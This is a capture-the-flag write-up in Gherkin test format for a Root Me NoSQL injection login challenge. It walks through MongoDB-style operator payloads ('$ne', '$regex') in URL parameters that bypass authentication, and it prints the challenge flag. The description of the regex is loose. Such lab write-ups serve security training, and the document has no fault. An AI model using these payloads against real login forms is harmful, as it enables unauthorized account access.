# Version 2.0
# language: en

Feature:  Web Server - Root Me
  Site:
     www.root-me.org
  Category:
    Web Server
  User:
    badwolf10
  Goal:
    Find the user login name using no sql injection

  Background:
  Hacker's software
    | <Software name>    |       <Version>      |
    | Ubuntu             | 18.04 LTS (x64)      |
    | Mozilla Firefox    | 63.0                 |
    | Visual Studio Code | 1.29.1               |
  Machine information:
    Given I the challenge url
    """
    https://www.root-me.org/en/Challenges/Web-Server/NoSQL-injection
    -authentication
    """
    Then I am redirected to the challenge website
    """
    http://challenge01.root-me.org/web-serveur/ch38/
    """
    And I am given a login and password field

  Scenario: Fail: No SQL injection
    Given the challenge website
    And the login and password field
    Then I fill them and i see the values are passed by the url
    """
    http://challenge01.root-me.org/web-serveur/ch38/?login=&pass=
    """
    Then I try the first injection in the arguments as
    """
    ?login[$ne]=1&pass[$ne]=1
    """
    And I get the message
    """
    You are connected as : admin
    """
    And I try another injection to dismiss admin user
    """
    ?login[$ne]=admin&pass[$ne]=1
    """
    And I get the message
    """
    You are connected as : test
    """
    And I realise I must rule out admin and test logins to find the hidden one

  Scenario: Success: Query out admin and test users
    Given the challenge website
    Then I write a regular expression to rule out user and admin in query
    """
    ?login[$regex]=[^admin|test]$&pass[$ne]=1
    """
    And I get the message
    """
     You are connected as : flag{nosqli_no_secret_4_you}
    """
    And I get the flag
    And I solve the challenge
